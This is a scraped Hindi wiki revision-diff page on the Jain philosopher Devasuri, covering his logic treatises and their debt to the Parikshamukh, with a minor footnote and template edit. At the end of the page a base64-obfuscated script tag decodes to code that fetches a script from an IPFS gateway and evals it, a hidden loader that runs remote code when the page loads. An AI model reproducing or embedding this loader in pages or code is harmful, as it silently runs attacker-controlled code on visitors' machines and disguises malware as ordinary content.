Difference between revisions of "देवसूरि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
(5 intermediate revisions by 2 users not shown)
Line 4: Line 4:
 
*इन दोनों पर आचार्य [[माणिक्यनन्दि]] के 'परीक्षामुख' का शब्दश: और अर्थश: पूरा प्रभाव है।  
 
*इन दोनों पर आचार्य [[माणिक्यनन्दि]] के 'परीक्षामुख' का शब्दश: और अर्थश: पूरा प्रभाव है।  
 
*इसके 6 परिच्छेद तो 'परीक्षामुख' की तरह ही हैं और अन्तिम दो परिच्छेद (नयपरिच्छेद तथा वादपरिच्छेद) परीक्षामुख से ज़्यादा हैं।  
 
*इसके 6 परिच्छेद तो 'परीक्षामुख' की तरह ही हैं और अन्तिम दो परिच्छेद (नयपरिच्छेद तथा वादपरिच्छेद) परीक्षामुख से ज़्यादा हैं।  
*पर उन पर भी परीक्षामुख<balloon title="परि0 6/73, 74" style=color:blue>*</balloon> के सूत्रों का प्रभाव लक्षित होता है।
+
*पर उन पर भी परीक्षामुख<ref>परि0 6/73, 74</ref> के सूत्रों का प्रभाव लक्षित होता है।
 +
{{प्रचार}}
 +
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{जैन धर्म2}}
 +
{{जैन धर्म}}
 
[[Category:दर्शन कोश]]
 
[[Category:दर्शन कोश]]
 
[[Category:जैन_दर्शन]]
 
[[Category:जैन_दर्शन]]
 
__INDEX__
 
__INDEX__

Latest revision as of 12:03, 15 June 2011

achary devasoori

  • devasoori 'vadi' upadhi se vibhooshit abhihit haian.
  • inake 'pramananayatattvalokalankar' aur usaki vyakhya 'syadvadaratnakar' ye do tarkagranth prasiddh haian.
  • in donoan par achary manikyanandi ke 'parikshamukh' ka shabdash: aur arthash: poora prabhav hai.
  • isake 6 parichchhed to 'parikshamukh' ki tarah hi haian aur antim do parichchhed (nayaparichchhed tatha vadaparichchhed) parikshamukh se zyada haian.
  • par un par bhi parikshamukh[1] ke sootroan ka prabhav lakshit hota hai.


tika tippani aur sandarbh

  1. pari0 6/73, 74

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>